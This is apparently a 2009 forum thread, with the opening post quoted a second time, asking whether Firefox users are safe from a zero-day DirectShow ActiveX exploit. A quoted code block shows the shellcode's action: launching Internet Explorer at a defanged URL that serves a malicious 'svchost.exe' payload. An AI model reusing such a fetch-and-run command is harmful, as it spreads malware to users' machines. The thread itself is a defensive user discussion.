Microsoft DirectShow vulnerability: are Firefox user
Posted: Sat Jul 11, 2009 3:08 pm
protected from this attack?
This is a 0 day exploit, that attack MPEG2TuneRequest ActiveX Control Object in the msVidCtl component of Microsoft DirectShow:
http://translate.google.com/translate?p ... ry_state0=
So does this affect IE user only?
I think it doesn't affect IE user only, because the shellcode force IE to launch
This user has tried with Opera browser:
http://www.wilderssecurity.com/showpost ... stcount=53
What do you think?
Can a script or shellcode access to filesystem and launch an application?
This is a my old question:
http://forums.informaction.com/viewtopic.php?f=19&t=361
This is a 0 day exploit, that attack MPEG2TuneRequest ActiveX Control Object in the msVidCtl component of Microsoft DirectShow:
http://translate.google.com/translate?p ... ry_state0=
So does this affect IE user only?
I think it doesn't affect IE user only, because the shellcode force IE to launch
Code: Select all
C:\%programfiles%\Internet Explorer\iexplore.exe
"hxxp://milllk.com/wm/svchost.exe"
http://www.wilderssecurity.com/showpost ... stcount=53
What do you think?
Can a script or shellcode access to filesystem and launch an application?
This is a my old question:
http://forums.informaction.com/viewtopic.php?f=19&t=361